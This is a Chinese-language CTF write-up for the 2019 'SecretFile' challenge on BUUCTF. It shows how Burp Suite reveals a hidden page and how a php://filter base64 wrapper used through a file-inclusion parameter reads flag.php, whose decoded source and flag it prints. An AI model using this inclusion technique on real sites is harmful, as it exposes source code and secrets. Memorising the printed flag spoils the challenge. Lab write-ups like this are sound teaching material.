极客大挑战2019-SecretFile

 · 2020-5-30  ·次阅读


题目地址:buuctf

打开题目

1

把一切都放在那里了 说明我们需要找到隐藏信息,查看源代码

2

发现./Archive_room.php

打开

3

点击secret

4

发现查阅结束,没看清么?回去再仔细看看吧。

多次尝试我们并没有发现有什么变化,那么使用burpsuit抓包

5

选择send to repeater

6

重放之后发现secr3t.php

访问

7

发现flag.php 访问

8

这次什么都没有,源代码中也没有任何发现,但是在secr3t.php中也有过滤,但是我们可以用filter协议,同样可以读取flag.php的内容

访问/secr3t.php?file=php://filter/convert.base64-encode/resource=flag.php

9

下边的一串字符就是flag.php的内容的base64形式

然后base64解码得到

<head>
    <meta charset="utf-8">
    <title>FLAG</title>
</head>

<body style="background-color:black;"><br><br><br><br><br><br>

    <h1 style="font-family:verdana;color:red;text-align:center;">啊哈!你找到我了!可是你看不到我QAQ~~~</h1><br><br><br>

    <p style="font-family:arial;color:red;font-size:20px;text-align:center;">
        <?php
            echo "我就在这里";
            $flag = 'flag{99d1cd98-c137-49fd-b4fa-caa468d75d01}';
            $secret = 'jiAng_Luyuan_w4nts_a_g1rIfri3nd'
        ?>
    </p>
</body>

提交flag